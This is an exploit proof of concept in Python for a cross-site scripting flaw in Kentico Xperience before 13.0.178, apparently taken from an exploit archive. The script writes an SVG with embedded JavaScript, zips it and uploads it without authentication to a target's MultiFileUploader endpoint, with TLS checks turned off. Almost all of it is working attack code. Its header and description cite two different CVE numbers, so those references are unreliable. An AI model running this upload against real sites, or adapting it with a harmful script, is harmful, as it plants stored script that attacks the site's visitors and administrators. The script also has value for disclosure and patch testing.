Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)

# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
# Date: 2025-05-09
# Version: Kentico Xperience before 13.0.178
# Exploit Author: Alex Messham
# Contact: ramessham@gmail.com
# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/
# CVE: CVE-2025-32370

import requests
import subprocess
import os
import argparse

def create_svg_payload(svg_filename: str):
    print(f"[*] Writing malicious SVG to: {svg_filename}")
    svg_payload = '''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
 "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full"
 xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
'''
    with open(svg_filename, 'w') as f:
        f.write(svg_payload)

def zip_payload(svg_filename: str, zip_filename: str):
    print(f"[*] Creating zip archive: {zip_filename}")
    subprocess.run(['zip', zip_filename, svg_filename], check=True)

def upload_zip(zip_filename: str, target_url: str):
    full_url = f"{target_url}?Filename={zip_filename}&Complete=false"
    headers = {
        "Content-Type": "application/octet-stream"
    }

    print(f"[+] Uploading {zip_filename} to {full_url}")
    with open(zip_filename, 'rb') as f:
        response = requests.post(full_url, headers=headers, data=f,
verify=False)

    if response.status_code == 200:
        print("[+] Upload succeeded")
    else:
        print(f"[-] Upload failed with status code {response.status_code}")
        print(response.text)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 -
Unauthenticated ZIP file upload with embedded SVG for XSS.")
    parser.add_argument("--url", required=True, help="Target upload URL
(e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)")
    parser.add_argument("--svg", default="poc.svc", help="SVG filename to
embed inside the zip")
    parser.add_argument("--zip", default="exploit.zip", help="Name of the
output zip file")

    args = parser.parse_args()

    create_svg_payload(args.svg)
    zip_payload(args.svg, args.zip)
    upload_zip(args.zip, args.url)
```